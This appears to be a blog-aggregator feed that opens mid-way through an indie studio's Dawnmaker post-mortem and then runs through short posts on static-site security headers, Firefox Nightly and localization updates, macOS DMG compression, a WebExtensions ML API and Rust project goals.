Looking back, I remember conversations we had were we justified the need for this work with the scope of the game, with the price we wanted to sell the game for, and thus with the expectations of our future players. The reasoning was, this is a $20 game, players will expect a lot of replayability, so we need to have a meta-progression that would enable it. I think that was a valid line of thought, if only we were actually making a $20 game. In the end, Dawnmaker was sold for $10. Had we realigned earlier, had we taken a real step back after we realized that we were not getting any significant funding, maybe we would have seen this. For a $10 game, we did not need such a complex meta-progression system. We could have focused more on developing the core of the game, building more content and gameplay systems, and landed on a much simpler progression.

Lesson learned

Things change during the lifetime of a game. Take a step back regularly to ask yourself if the assumptions you made earlier are still valid today.

Prototyping the wrong way

I mentioned earlier that we spent a lot of time in preproduction, working on finding the best version of the core gameplay of our game. I said it was a good thing, but it's also a bad one because it took us way too long to find it. And the reason is simple: we did prototyping wrong.

Screenshot of Dawnmaker, January 2023 <figcaption>Dawnmaker in January 2023</figcaption>

The goal of prototyping is to answer one or a few questions as fast as possible. In order to do that, you need to focus on building just what you need to answer your question, and nothing else. If you start putting actual art in your gameplay prototype, or gameplay in your art prototype, then you're not making a prototype: you're making a game. That's what we did. Too early we started working on adding art to our gameplay prototype. Our first recorded prototype, which we did in Godot, had some art in it. Basic one, sure, but art anyway. The time it took to integrate the art into that prototype is time that was not spent answering the main question the prototype was supposed to answer — at that time: was the core gameplay loop fun?

It might seem inconsequential in a small prototype, but that cost quickly adds up. You're not as agile as you would be if you focused on only one thing. You're solving issues related to your assets instead of focusing on gameplay. And then you're a bit disappointed because it doesn't look too great so you start spending time improving the art. Really quickly you end up building a small game, instead of building a small prototype. Our first prototype even had sound! What the hell? Why did we put sound in a prototype that was crap, and was meant to help us figure out that the gameplay was crap?

Lesson learned

Make your prototypes as small and as focused as possible. Do not mix gameplay and art prototypes. Make sure each prototype answers one question. Prototype as many things as possible before moving on to preproduction.

Not playing to our strengths

I mentioned earlier that we had a 3D board in the game for a few months. Going 3D was a mistake that cost us a lot of time, because I had to program the whole thing, in an environment that had little tools and conveniences — we were not using an engine like Godot or Unity. And I was not good at 3D, I had never worked on a 3D game before, so I had a learn a lot in order to do something functional. The end result was something that worked, but wasn't very pleasant to look at. It had performance issues on my computer, it had bugs that I had no clue how to debug. We ended up ditching the whole 3D board after a lot of discussions and conflicts. The ultimate nail in the coffin came from a publisher who had been shown the game, and who asked: "what is the added value of 3D for this game?" Being unable to give a satisfying answer, we moved back to a 2D board, and were much better for it.

Screenshot of Dawnmaker with a 3D board <figcaption>Dawnmaker in June 2023, with a 3D board</figcaption>

So my question is: why did we go 3D for that period of time? I think there were two reasons working together to send us in that trap. The first one is that we did not assess our strengths and weaknesses enough. Alexis's strength was making 3D art, while I had no experience in implementing 3D in a game, and we knew it, but we did not weight those enough. The second reason is that we did not know enough about our tools to figure out that we could find a good compromise. See, we thought that we could either go 3D and build everything in 3D, from building models in blender to integrating on a 3D board in the game, or we could go 2D, which would simplify my work but would force Alexis to draw sprites by hand.

What we figured out later on was that there were tools that allowed Alexis to work in 3D, creating models and animations in blender, but export everything for a 2D environment very easily. There was a way to have the best of both worlds, exploiting our strengths without requiring us to learn something new and complex — which we definitely did not want to do for our first commercial game. Our mistake was to not take the time to research that, to find that compromise.

Lesson learned

Research the tools at your disposal, and always look for the most efficient way to do things. Play to the strengths of your team, especially for your first games.

Building a vertical slice instead of a horizontal one

We struggled a lot to figure out what our vertical slice should be. How could we prove that our game was viable to a potential investor? That's what the vertical slice is supposed to do, by providing a "slice" of your game that is representative of the final product you intend to build. It's supposed to have a small subset of your content, like a level, with a very high level of polish. How do you do that for a game that is systemic in nature? How do you build the equivalent of a "level" of a game like Dawnmaker?

We did not find a proper answer to this question. We were constantly juggling priorities between adding systems, because we needed to prove that the game worked and was fun, and adding signs, feedback and juice, because we believed we had to show what the final product would look and feel like. We were basically building the entire game, instead of just a slice of it. This was in part because we had basically no credentials to our name, as Dawnmaker was our first real game, and feared publishers would have trouble trusting that we would be able to execute the "icing" part of the game. I still think that's a real problem, and the only solution that I see is to not try to go for funding for your first games. But I'll talk more about that in the Company strategy section below.

Screenshot of Dawnmaker, November 2023 <figcaption>Dawnmaker in November 2023</figcaption>

However, I recently came across the concept of horizontal slice, as opposed to the vertical slice, and that blew my mind. The idea is, instead of building a small piece of your game with final quality, to build almost all of the base layers of the game. So, you would build all the systems, a good chunk of the content, everything that is required to show that the gameplay works and is fun. Without working on the game's feel, its signs and feedback, a tutorial, and so. No icing on the cake, just the meat of it. (Meat in a cake? Yeah, that sounds weird. Or British, I don't know.) The goal of the horizontal slice is to prove that the game as a whole works, that all the systems fit together in harmony, and that the game is fun.

I believe that this is a much better model for a game like Dawnmaker. A game like Mario is fun because it has great controls, pretty assets and funny situations. That's what you prove with a vertical slice. But take a game like Balatro. It is fun because it has reached a balance between all the systems, because it has enough depth to provide a nearly-endless replayability. Controls, feedback and juice are still important of course, but they are not the core of the game, and thus when building such a game, one should not focus on those aspects, but on the systems. We should have done the same with Dawnmaker, and I'll be aiming for a horizontal slice with my next strategy game for sure.

Lesson learned

Different types of games require different processes. Find the process that best serves the development of yours. If you're making some sort of systemic game, maybe building a horizontal slice is a better tool than going for the commonly used vertical slice?

Game weaknesses

Let's now talk about the game itself. Dawnmaker received really good reviews, but I still believe it is lacking in many ways. There are many problems with the gameplay: it lacks some form of adjustable difficulty, to make it a better challenge for a bigger range of players. It lacks a more rewarding and engaging meta-progression. And of course it lacks content, as we never actually did our production phase.

Weak meta-progression

As I wrote earlier, I am very happy about the core loop of Dawnmaker. However, I think we failed big with its meta-progression. We decided to make it a roguelike, meaning that there is no progression between runs. You always start a run from the same state. Many players disliked that, and I now understand why, and why roguelites have gained in popularity a lot.

I recently read an article by Chris Zukowski where he discusses the kind of difficulty that Steam players like. I agree with his analysis and his concept of the "Easy-Hard-Easy (but variable)" difficulty, as I think that's part of a lot of the big successes on Steam these last few years. To summarize (read the article for more details), players like to have an easy micro-loop (the core actions of the game, what you do during one turn), a hard macro-loop (the medium-term goals, in our case, getting enough Eclairium to level up before running out of Luminoil), and on top of that, a meta-progression that they have a lot of control over, and that allows them to adjust the difficulty of the challenge. An example I like a lot is Hades and its Mirror of Night: playing the game is easy, controls are great, but winning a run is very hard. However, by choosing to grind darkness and using it to unlock certain upgrades in the mirror, you get to make the challenge a lot easier. But someone else might decide to not grind darkness, or not spend, and play with a much greater challenge. The player has a lot of control over the difficulty of the game.

Screenshot of Dawnmaker's world map <figcaption>Dawnmaker's world map</figcaption>

I think this is the biggest miss of Dawnmaker in terms of gameplay. Players cannot adjust the difficulty of the game to their tastes, which has been frustrating for a lot of them. Some complained it was way too hard while others have found the game too easy and would have enjoyed more challenge. All of them would have enjoyed the game a lot more had they had a way to control the challenge one way or another. Our mistake was to have some progression inside a run, but not outside. A player can grow stronger during a run, improving their decks or starting resources, but when they lose a run they have to start from scratch again. A player who struggles with the challenge has no way to smooth the difficulty, they have to work and learn how to play better. The "git gud" philosophy might work in some genres, but evidently it didn't fit with the audience of Dawnmaker.

This is not something that would have been easy to add though. I think it's something that needs to be thought about quite early in the process, as it impacts the core gameplay a lot. We tried to add meta-progression to our game too late in the process, and that's a reason we failed: it was too difficult to add good progression without impacting the careful balance of the core gameplay, and having to profoundly rework it.

Lesson learned

Offering an adaptative challenge is important for Steam players, and meta-progression is a good tool to do that. But it needs to be anticipated relatively early, as it is tightly tied to your core gameplay.

Lack of a strong fantasy

I believe the biggest cause for Dawnmaker's financial failure is that it lacks a strong fantasy. That gave us a lot of trouble, mostly in trying to sell the game to players. Presenting it as a "city building meets deckbuilding" is not a fantasy, it's genres. We tried to put forth the "combo" gameplay, telling that cards and buildings combine to create powerful effects, but as I just wrote, that's gameplay and not a fantasy. Our fantasy was to "bring life back to a dead world", but that's not nearly strong enough: it's not surprising nor exciting.

Screenshot of Dawnmaker, February 2024 <figcaption>Dawnmaker in February 2024</figcaption>

In hindsight, I believe we missed a huge opportunity in making the zeppelin our main fantasy. It's something that's not often seen in games, it's a great figure for the ambiance of the game, and I think it would have helped create a better meta-progression. We have an "Airship" view in the game, where players can improve their starting state for the next region they're going to explore, but it's a very basic UI. There was potential to make something more exciting there.

The reason for this failure is that we started this project with mechanics and not with the fantasy. We spent a long time figuring out what our core gameplay would be, testing it until it was fun. And only then did we ask ourselves what the fantasy should be. It turns out that putting a fantasy and a theme on top of gameplay is not easy. I don't mean to say it's impossible, some have successfully done it, but I believe it is much harder than starting with an exciting fantasy and building gameplay on top of it.

Lesson learned

Marketing starts day 1 of the creation of a game. The 2 key elements that sell your game are the genre(s) of the game, and its fantasy or hook. Do not neglect those if you want to make money with your game.

This mistake was in part caused by me being focused primarily on mechanics as a game designer. I often start a project with a gameplay idea, a gimmick or a genre, but rarely with a theme, emotion or fantasy. It's not a problem to start with mechanics, of course. But the fantasy is what sells the game. My goal for my next games, as a designer, is to work on finding a strong fantasy that fits my mechanics much earlier in the process, and build on it instead of trying to shove it into an advanced core loop.

Company strategy

Oooo boy did we make mistakes on a company level. By that I mean, with managing our money. We messed up pretty bad — though seeing stories that pop up regularly on some gamedev subreddits, it could have been way worse. Doesn't mean there aren't lessons to be learned here, so let's dive in!

Hiring too soon, too quick

Managing money is difficult! Or at least, we've not been very good at it. We made the mistake of spending money at the wrong time or for the wrong things several times. That mainly happened because we had too much trust in the future, in the fact that we would find money easily, either by selling our game or by getting public money or investors. If we did get some public funding, that was not nearly enough to cover what we spent, and so Dawnmaker was mostly paid for by our personal savings.

The biggest misplacement of money we made was to poorly hire people. We made two different mistakes here: on one occasion, we hired someone without properly testing that person and making sure they would fit our team and project. On the other, we hired someone only to realize when they started that we did not have work to give them, because we were way too early in the game's development. Both recruitments ended up costing us a significant amount of money while bring very little value to the game or the company.

But those failed recruitments had another bad consequence: we hurt people in the process. Our inexperience has been a source of pain for human beings who chose to trust us. That is a terrible feeling for me. I don't know what more to write about this, other than I think I've learned and I hope I won't be hurting others in the future. I'll do my best anyway.

Lesson learned

Hiring is freaking hard. Do not rush it. It's better to not hire than to hire the wrong person.

Too much investment into our first game

I've talked about it already in previous sections, but the biggest strategic mistake on Dawnmaker was to spend so much time on it. Making games is hard, making games that sell is even harder, and there's an incredible amount of luck involved there. Of course, the better your game, the higher your chances. But making good games requires experience. Investing 2.5 years into our first commercial game was way too risky: the more time we spent on the game, the more money it needed to make out, and I don't believe a game's revenue scales with the time invested in it.

Side note: we made a game before Dawnmaker, called Phytomancer — it's available on itch.io for 3€ — but because it had no commercial ambition, I don't think it counts much on the key areas of making games that sell.

Here are facts:

Dawnmaker vertical capsule

  • Dawnmaker cost us about 320k€ to make — read my in-depth article about Dawnmaker's real cost for more details — and only made us about 8k€ in net revenue. That is a financial catastrophe, only possible because we invested a lot of our time and personal savings, and we benefited from some French social welfare.
  • Most indie studios close after they release their first game. It's unclear what the exact causes are, but from personal experience, I bet it's in big part because those companies invest too much in there first game and have nothing left when it comes to making the second one — either money or energy. We tend to burn cash and ourselves out.
  • And there's an economic context too: investments in games and game companies have slowed down to a trickle the past couple years, and they don't seem to be going back up soon. Games are very expensive to make, and the actors that used to pay for their production (publishers, investors) are not playing that role anymore.

Considering this, I strongly believe that today, investing several years into making your first game is not a valid company strategy. It's engaging in an act of faith. And a business should not run on faith. What pains me is that we knew this when we started Arpentor Studio, and we wanted to make Dawnmaker in about a year. But we lacked the discipline to actually keep that deadline, and we lost ourselves in the process. We got heavily side-tracked by thinking we could get some funding, by growing our scope to ask for more money, etc. We didn't start the project with a clear objective, with a strict deadline. So we kept delaying and delaying. We had the comfort of having decent money reserves. We never thought about what would happen after releasing Dawnmaker, never asked ourselves what our situation would be if the game took 3 years to release and didn't make any money. We should have.

Lesson learned

Start by making small games! Learn, experiment, grow, then go for bigger games when you're in a better position to succeed.

Here are my arguments for making several small games instead of investing too much into a single bigger game. Note that these are targeted to folks trying to create a games studio, to make a business of selling games. If your goal is to create your dream game, or if you're in it for the art but don't care about the money, this likely does not apply to you.

  • By releasing more games, you gain a lot of key experience in the business of making games that sell. You receive more player feedback. You have the opportunity to try more things. You learn the tricks of the platform(s) you're selling on — Steam is hard!
  • By releasing more games, you give yourself more chances to break out, to hit that magic moment when a game finds its audience, because it arrives at the right moment, in the right place. (For more on this, I highly recommend this article by Ryan Rigney: Nobody Knows If Your Game Will Pop Off, where the authors talks about ways of predicting a hit and the correlation between the number of hits and the number of works produced.)
  • By releasing more games, you build yourself a back catalog. Games sell more on their first day, week or month, for sure, but that doesn't mean they stop selling afterwards. Games on Steam keep generating revenue for a long time, even if a small one. And a small revenue is infinitely better than no revenue at all. And small revenues can pile up to make, who knows, a decent revenue?
  • By releasing more games, you grow your audience. Each game is a way to reach new people and bring them to your following — be it through a newsletter, a discord server or your social networks. The bigger your audience, the higher your chances of selling your next game.
  • By releasing more games, you build your credibility as a game developer. When you go to an investor to show them your incredible new idea, you will make a much better impression if you have already released 5 games on Steam. You prove to them that you know how to finish a game.

Keep in mind that making small games is really, really hard. It requires a lot of discipline and planning. This is where we failed: we wanted to make our game in one year, but never planned that time. We never wrote down what our deadline was, never budgeted that year into milestones. If you want to succeed there, you need to accept that your game will not be perfect, or even good. That's fine. The goal is not to make a great game, it's to release a game. However imperfect that game is, the success criteria is not its quality, or its sales numbers. The number one success criteria is that people can buy it.

<figcaption>Dawnmaker's cinematic release trailer</figcaption>

Conclusion

I wanted to end here, because I think this is the most important thing to learn from this post-mortem. If you're trying to build a sustainable game studio, if you're in it for the long run, then please, please start by making small games. Don't gamble on a crazy-big first game. Garner experience. Learn how the market works. Try things in a way that will cost you as little as possible. Build your audience and your credibility. Then, when the time is right, you'll be much better equipped to take on bigger projects. That doesn't mean you will automatically succeed, but your chances will be much, much higher.

As for myself? Well, I'm trying to learn from my own mistakes. My next project will be a much shorter one, with strict deadlines and milestones. I will capitalize on what I made for Dawnmaker, reusing as many tools and wisdom as possible. Trying to make the best possible game with what time, money and resources I have. All I can say for now is that it's going to be a deckbuilding strategy game about an alchemist trying to create the Philosopher's Stone. I will talk about it more on my blog and on Arpentor's newsletter, so I hope you'll follow me into that next adventure!

Subscribe to Arpentor Studio's Newsletter! One email about every other month, no spams, with insights on the development of our games and access to early versions of future projects.

Thanks a lot to Elli for their proofreading of this very long post!

Don Martisecurity headers for a static site

This site now has an OPML version (XML) of the blogroll. What can I do with it? It seems like the old Share your OPML site is no more. Any ideas?

Also went through Securing your static website with HTTP response headers by Matt Hobbs and got a clean bill of health from the Security Headers site. Here’s what I have on here as of today:

Access-Control-Allow-Origin "https://blog.zgp.org/" Cache-Control "max-age=3600" Content-Security-Policy "base-uri 'self'; default-src 'self'; frame-ancestors 'self';" Cross-Origin-Opener-Policy "same-origin" Permissions-Policy "accelerometer=(),autoplay=(),browsing-topics=(),camera=(),display-capture=(),document-domain=(),encrypted-media=(),fullscreen=(),geolocation=(),gyroscope=(),magnetometer=(),microphone=(),midi=(),payment=(),picture-in-picture=(),publickey-credentials-get=(),screen-wake-lock=(),sync-xhr=(self),usb=(),web-share=(),xr-spatial-tracking=()" "expr=%{CONTENT_TYPE} =~ m#text\/(html|javascript)|application\/pdf|xml#i" Referrer-Policy no-referrer-when-downgrade Cross-Origin-Resource-Policy same-origin Cross-Origin-Embedder-Policy require-corp Strict-Transport-Security "max-age=2592000" X-Content-Type-Options: nosniff

(update 2 Feb 2025) This site has some pages with inline styles, so I can’t use that CSP line right now.

To allow inline styles:

Content-Security-Policy "base-uri 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'self';" 

This is because I use the SingleFile extension to make mirrored copies of pages, so I need to move those into their own virtual host so I can go back to using the version without the unsafe-inline.

I saved a copy of Back to the Building Blocks: A Path Toward Secure and Measurable Software (PDF). The original seems to have been taken down, but it’s a US Government document so I can keep a copy on here (like the FBI alert that got taken down last year, which I also have a copy of.)

Bonus links

Why is Big Tech hellbent on making AI opt-out? by Richard Speed. Rather than asking we’re going to shovel a load of AI services into your apps that you never asked for, but our investors really need you to use, is this OK? the assumption instead is that users will be delighted to see their formerly pristine applications cluttered with AI features. Customers, however, seem largely dissatisfied. (IMHO if the EU is really going to throw down and do a software trade war with the USA, this is the best time to switch to European Alternatives.
Big-time proprietary software is breaking compatibility while independent alternatives keep on going. People lined up for Microsoft Windows 95 in 1995 and Apple iPhones in 2007, and a trade war with the USA would have been a problem for software users then, but now the EuroStack is a thing. The China stack, too, as Prof. Yu Zhou points out: China tech shrugged off Trump’s ‘trade war’ − there’s no reason it won’t do the same with new tariffs. I updated generative ai antimoats with some recent links. Even if the AI boom does catch on among users, services that use AI are more likely to use predictable independently-hosted models than to rely on Big Tech APIs that can be EOLed or nerfed at any time, or just have the price increased.)

California vs Texas Minimum Wage, 2013-2024 by Barry Ritholtz. [F]or seven years–from January 2013 to March 2020–[California and Texas quick-service restaurant] employment moved almost identically, the correlation between them 0.994. During that seven year period, however, TX had a flat $7.25/hr minimum wage while CA increased its minimum wage by 50%, from $8/hr to $12. Related: Is a Big Mac in Denmark Pricier Than in US?

What’s happening on RedNote? A media scholar explains the app TikTok users are fleeing to – and the cultural moment unfolding there Jianqing Chen covers the Xiaohongshu boom in the USA. This spontaneous convergence recalls the internet’s original dream of a global village. It’s a glimmer of hope for connection and communication in a divided world. (This is such authentic organic social that the Xiaohongshu ToS hasn’t even been translated into English yet. And not only does nobody read privacy policies (we knew that) but videos about reuniting with your Chinese spy from TikTok are a whole trend on there. One marketing company put up a page of Rules & Community Guidelines translated into English but I haven’t cross-checked it. Practice the core socialist values. and Promote scientific thinking and popularize scientific knowledge.)

Bob Sullivan reports Facebook acknowledges it’s in a global fight to stop scams, and might not be winning (The bigger global fight they’re in is a labor/management one, and when moderator jobs get less remunerative or more stressful, the users get stuck dealing with more crime.) Related: Meta AI case lawyer quits after Mark Zuckerberg’s ‘Neo-Nazi madness’; Llama depositions unsealed by Amy Castor and David Gerard. (The direct mail/database/surveillance marketing business, get-rich-quick schemes, and various right-wing political movements have been one big overlapping scene in the USA for quite a while, at least back to the Direct Mail and the Rise of the New Right days and possibly further. People in the USA get targeted for a lot of political disinformation and fraud (one scheme can be both), so the Xiaohongshu mod team will be in for a shock as scammers, trolls, and worse will follow the US users onto their platform.)

Firefox NightlyNew Year New Tab – These Weeks in Firefox: Issue 175

Highlights

  • Firefox 134 went out earlier this month!
  • A refreshed New Tab layout is being rolled out to users in the US and Canada, featuring a repositioned logo and weather widget to prioritize Web Search, Shortcuts, and Recommended Stories at the top. The update includes changes to the card UI for recommended stories and allows users with larger screens to see up to four columns, making better use of space.
    • The Firefox New Tab page is shown with the browser logo in the top-left, the weather indicator in the top-right, and 4 columns of stories rather than 3.

      Making better use of the space on the New Tab page!

  • dao enabled the ability to search for closed and saved tab groups (Bug 1936831)
  • kcochrane landed a keyboard shortcut for expanding and collapsing the new sidebar
    • Collapse/Expand sidebar (Ctrl + Alt + Z) – for Linux/Win
    • Collapse/Expand sidebar (⌃Z) – for macOS

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  •  Karan Yadav

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed about:addons blocklist state message-bars not refreshed when the add-on active state doesn’t change along with the blocklist state (Bug 1936407)
  • Fixed a moz-toggle button related visual regression in about:addons (regression introduced from Bug 1917305 in Nightly 135 and fixed in the same release by Bug 1937627)
  • Adjusted popup notification primary button default string to match the Acorn style guide (Bug 1935726)
WebExtensions Framework
  • Fixed an add-on debugging toolbox regression on resending add-ons network requests from the DevTools Network panel (regression introduced in Nightly 134 from Bug 1754452 and fixed in Nightly 135 by Bug 1934478)
    • Thanks to Alexandre Poirot for fixing this add-on debugging regression
WebExtension APIs
  • Fixed notification API event listeners not restarting suspended extension event pages (Bug 1932263)
  • As part of the work for the MV3 userScripts API (currently locked behind a pref in Nightly 134 and 135):
    • Introduced permission warning in the Firefox Desktop about:addons extensions permissions view (Bug 1931545)
    • Introduced userScripts optional permissions request dialog on Firefox Desktop (Bug 1931548)
    • NOTE: An MV3 userScripts example extensions added to the MDN webextensions examples repo is being worked on in the following github pull request: https://github.com/mdn/webextensions-examples/pull/576
    • The permission warning in the Firefox Desktop about:addons extensions permissions view. It is showing a warning: "Unverified scripts can pose security and privacy risks, such as running harmful code or tracking website activity. Only run scripts from extensions or sources you trust."The WebExtension permission request dialog in the Firefox Desktop when installing or updating an extension is shown. It is showing a warning: "Unverified scripts can pose security and privacy risks. Only run scripts from extensions or sources you trust."

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam (:ldebeasi) added support for the format argument to the browsingContext.captureScreenshot command. Clients can use it to specify an image format with a type such as “image/jpg” and a quality ranging between 0 and 1 (#1861737)
    • Spencer (:speneth) created a helper to check if a browsing context is a top-level browsing context (#1927829)
  • Internal:
    • Sasha landed several fixes to allow saving minidump files easily with geckodriver for both Firefox on desktop and mobile, which will allow to debug crashes more efficiently (#1882338, #1859377, #1937790)
    • Henrik enabled the remote.events.async.enabled preferences, which means we now process and dispatch action sequences in the parent process (#1922077)
    • Henrik fixed a bug with our AnimationFramePromise which could cause actions to hang if a navigation was triggered (#1937118)

Information Management

  • We’re delaying letting the new sidebar (sidebar.revamp pref) ride the trains while we address findings from user diary studies, experiments and other feedback. Stay tuned!
  • Reworked the vertical tabs mute button in Bug 1921060 – Implement the full mute button spec
  • We’re focusing on fixing papercuts for the new sidebar and vertical tabs.

Migration Improvements

  • We’ve concluded the experiment that encouraged users to create or sign-in to Mozilla accounts to sync from the AppMenu and FxA toolbar menu. We’re currently analyzing the results.
  • Before the end of 2024, we were able to get some patches into 135 that will let us try some icon variations for the signed-out state for the FxA toolbar menu button. We’ll hopefully be testing those when 135 goes out to release!

Performance Tools (aka Firefox Profiler)

  • We added a new way to filter the profile to only include the data that is related to the tab you would like to see, by adding tab selector. You can see this by clicking the “Full Profile” button on the top left corner. This allows web and gecko developers to only focus on a certain website.
    • A dropdown selector is shown above the tracks in the Firefox Profiler UI. The dropdown lists "All tabs and windows" and then "browser", followed by a list of individual domains. like "www.mozilla.org" and "www.google.com".
  • We implemented a new way to control the profiler using POSIX signals on macOS and Linux. You can send SIGUSR1 to the Firefox main process to start the profiler and SIGUSR2 to stop and dump the profile to disk. We hope that this feature will be useful for cases where Firefox is completely frozen and using the usual profiler buttons is not an option. See our documentation here.
  • Lots of performance work to make the profiler itself faster.

Search and Navigation

Scotch Bonnet

  • Mandy enhanced restricted search keywords so that users can use both their own localized language as well as the English shortcut Bug 1933003
  • Daisuke fixed an issue where pressing ctrl+shift+tab while the Unified Search Button was enabled and the address bar is focused would not go to the previous tab Bug 1931915
  • Daisuke also fixed an issue where focusing the urlbar with a click and pressing shift tab wouldn’t focus the Unified Search Button Bug 1933251
  • Daisuke enabled the keyboard focus of the Unified Search Button using Shift + Tab after focus using CTRL + L Bug 1937363
  • Daisuke changed the behavior of the Unified Search Button to show when editing a URL instead of initial focus Bug 1936090
  • Lots of other papercuts fixed by the team

Search

  • Mandy initiated the removal of old application provided search engine WebExtensions from a users profile as they no longer require them due to the usage of search-config-v2 Bug 1885953

Suggest

  • Drew implemented a new simplified UI treatment for Weather Suggestions Bug 1938517
  • Drew removed the Suggest JS Backend as the Rust based backend was enabled by default in 124 Bug 1932502

Storybook/Reusable Components

  • Anna Kulyk added new  –table-row-background-color and –table-row-background-color-alternate design tokens Bug 1919313
  • Anna Kulyk added support for the panel-item disabled attribute Bug 1919122

Mozilla Localization (L10N)L10n report: January 2025 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

What’s new or coming up in Firefox desktop

Tab Groups

Tab groups are now available in Nightly 136! To create a group in Nightly, all you have to do is have two tabs open, click and drag one tab to the other, pause a sec and then drop. From there the tab group editor window will appear where you can name the group and give it a color. After saving, the group will appear on your tab bar.

Once you create a group, you can easily access your groups from the overflow menu on the right.

 

These work great in the sidebar and vertical tabs feature that was released in the Firefox Labs feature in Nightly 131!

New profile selector

The new profile selector which we have been localizing over the previous months is now starting to roll out gradually to users in Nightly 136. SUMO has an excellent article about all the new changes which you can find here.

What’s new or coming up in web projects

AMO and AMO Frontend

The team is planning to migrate/copy the Spanish (es) locale into four: es-AR, es-CL, es-ES, and es-MX. Per the community managers’ input, all locales will retain the suggestions that have not been approved at the time of migration. Be on the lookout for the changes in the upcoming week(s).

Mozilla Accounts

The Mozilla accounts team recently landed strings used in three emails planned to be sent over the course of 90 days, with the first happening in the coming weeks. These will be sent to inactive users who have not logged in or interacted with the Mozilla accounts service in 2 years, letting them know their account and data may be deleted.

What’s new or coming up in SUMO

The CX team is still working on 2025 planning. In the meantime, read a recap from our technical writer, Lucas Siebert about how 2024 went in this blog post. We will also have a community call coming up on Feb 5th at 5 PM UTC. Check out the agenda for more detail and we’d love to see you there!

Last but not least, we will be at FOSDEM 2025. Mozilla’s booth will be at the K building, level 1. Would love to see you if you’re around!

What’s new or coming up in Pontoon

New Email Features

We’re excited to announce two new email features that will keep you better informed and connected with your localization work on Pontoon:

Email Notifications: Opt in to receive notifications via email, ensuring you stay up to date with important events even when you’re away from the platform. You can choose between daily or weekly digests and subscribe to specific notification types only.

Monthly Activity Summary: If enabled, you’ll receive an email summary at the start of each month, highlighting your personal activity and key activities within your teams for the previous month.

Visit your settings to explore and activate these features today!

New Translation Memory tools are here!

If you are a locale manager or translator, here’s what you can do from the new TM tab on your team page:

  • Search, edit, and delete Translation Memory entries with ease.
  • Upload .TMX files to instantly share your Translation Memories with your team.

These tools are here to save you time and boost the quality of suggestions from Machinery. Dive in and explore the new features today!

Moving to GitHub Discussions

Feedback, support and conversations on new Pontoon developments have moved from Discourse to GitHub Discussions. See you there!

Newly published localizer facing documentation

Events

Come check out our end of year presentation on Pontoon! A Youtube link and AirMozilla link are available.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Firefox NightlyFirefox on macOS: now smaller and quicker to install!

Firefox is typically installed on macOS by downloading a DMG (Disk iMaGe) file, and dragging the Firefox.app into /Applications. These DMG files are compressed to reduce download time. As of Firefox 136, we’re making an under the hood change to them, and switching from bzip2 to lzma compression, which shrinks their size by ~9% and cuts decompression time by ~50%.

Why now?

If you’re familiar with macOS packaging, you’ll know that LZMA support was introduced in macOS 10.15, all the way back in 2015. However, Firefox continued to support older versions of macOS until Firefox 116.0 was released in August 2023, which meant that we couldn’t use it prior to then.

But that still begs the question: why wait ~18 months later to realize these improvements? Answering that question requires a bit of explanation of how we package Firefox…

Packaging Firefox for macOS… on Linux!

Most DMGs are created with hdiutil, a standard tool that ships with macOS. hdiutil is a fine tool, but unfortunately, it only runs natively on macOS. This a problem for us, because we package Firefox thousands of times per day, and it is impractical to maintain a fleet of macOS machines large enough to support this. Instead, we use libdmg-hfsplus, a 3rd party tool that runs on Linux, to create our DMGs. This allows us to scale these operations as much as needed for a fraction of the cost.

Why now, redux

Until recently, our fork of libdmg-hfsplus only supported bzip2 compression, which of course made it impossible for us to use lzma. Thanks to some recent efforts by Dave Vasilevsky, a wonderful volunteer who previously added bzip2 support, it now supports lzma compression.

We quietly enabled this for Firefox Nightly in 135.0, and now that it’s had some bake time there, we’re confident that it’s ready to be shipped on Beta and Release.

Why LZMA?

DMGs support many types of compression: bzip2, zlib, lzfse and lzma being the most notable. Each of these has strengths and weaknesses:

  • bzip2 has the best compression (in terms of size) that is supported on all macOS versions, but the slowest decompression
  • zlib has very fast decompression, at the cost of increased package size
  • lzfse has the fastest decompression, but the second largest package size
  • lzma has the second fastest decompression and the best compression in terms of size, at the cost of increased compression times

With all of this in mind, we chose lzma to make improvements on both download size and installation time.

You may wonder why download size is an important consideration, seeing as fast broadband connections are common these days. This may be true in many places, but not everyone has the benefits of a fast unmetered connection. Reducing download size has an outsized impact for users with slow connections, or those who pay for each gigabyte used.

What does this mean for you?

Absolutely nothing! Other than a quicker installation experience, you should see absolutely no changes to the Firefox installation experience.

Of course, edge cases exist and bugs are possible. If you do notice something that you think may be related to this change please file a bug or post on discourse to bring it to our attention.

Get involved!

If you’d like to be like Dave, and contribute to Firefox development, take a look at codetribute.mozilla.org. Whether you’re interested in automation and tools, the Firefox frontend, the Javascript engine, or many other things, there’s an opportunity waiting just for you!

Mozilla Addons BlogAnnouncing the WebExtensions ML API

Greetings extension developers!

We wanted to highlight this just-published blog post from our AI team where they share some exciting news – we’re shipping a new experimental ML API in Firefox that will allow developers to leverage our AI Runtime to run offline machine learning tasks in their web extensions.

Head on over to Mozilla’s AI blog to learn more. After you’ve had a chance to check it out, we encourage you to share feedback, comments, or questions over on the Mozilla AI Discord (invite link).

Happy coding!

The post Announcing the WebExtensions ML API appeared first on Mozilla Add-ons Community Blog.

The Rust Programming Language BlogDecember Project Goals Update

Over the last six months, the Rust project has been working towards a slate of 26 project goals, with 3 of them designated as Flagship Goals. This post provides a final update on our progress towards these goals (or, in some cases, lack thereof). We are currently finalizing plans for the next round of project goals, which will cover 2025H1. The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Our big goal for this period was async closures, and we are excited to announce that work there is done! Stable support for async closures landed on nightly on Dec 12 and it will be included in Rust 1.85, which ships on Feb 20. Big kudos to compiler-errors for driving that.

For our other goals, we made progress, but there remains work to be done:

  • Return Type Notation (RTN) is implemented and we had a call for experimentation but it has not yet reached stable. This will be done as part of our 2025H1 goal.
